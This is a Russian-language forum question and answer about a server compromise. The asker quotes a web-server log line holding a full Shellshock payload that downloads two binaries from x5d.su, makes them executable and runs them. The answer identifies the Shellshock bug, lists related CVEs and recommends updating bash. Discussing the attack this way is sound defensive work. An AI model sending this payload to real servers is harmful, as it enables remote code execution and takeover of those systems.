Мы обнаружили двоичные файлы /tmp/susu1, /tmp/susu2запущенные пользователем веб-сервера.
В журналах имеются следующие записи:
[24/Sep/2015:06:09:34 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 301 0 "() { :;} ;
echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";
''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''
$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''
if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''
$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''
$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
Но мы нашли только коды ошибок таких запросов 301, 302, 403, 404, 500. Кода 200er, который бы указывал на успешность взлома, не обнаружено.
Это распространенная проблема безопасности? Как ее можно исправить? Или как ее можно отследить дальше?
решение1
Похоже, это атака shellshock, о ней впервые было объявлено 24 сентября 2014 года, когда bash выпустил исправление этой ошибки.
Первая ошибка приводит к тому, что Bash непреднамеренно выполняет команды, когда команды присоединяются к концу определений функций, хранящихся в значениях переменных среды.1[6] В течение нескольких дней после публикации этого сообщения тщательный анализ основных недостатков дизайна выявил ряд связанных уязвимостей (CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186 и CVE-2014-7187), которые Рэми устранил с помощью серии дополнительных исправлений.
Вы можете проверить, уязвима ли ваша система, как описано вКак проверить, уязвим ли мой сервер к уязвимости ShellShock?
Чтобы устранить проблему, вам необходимо обновить систему или, по крайней мере, версию Bash.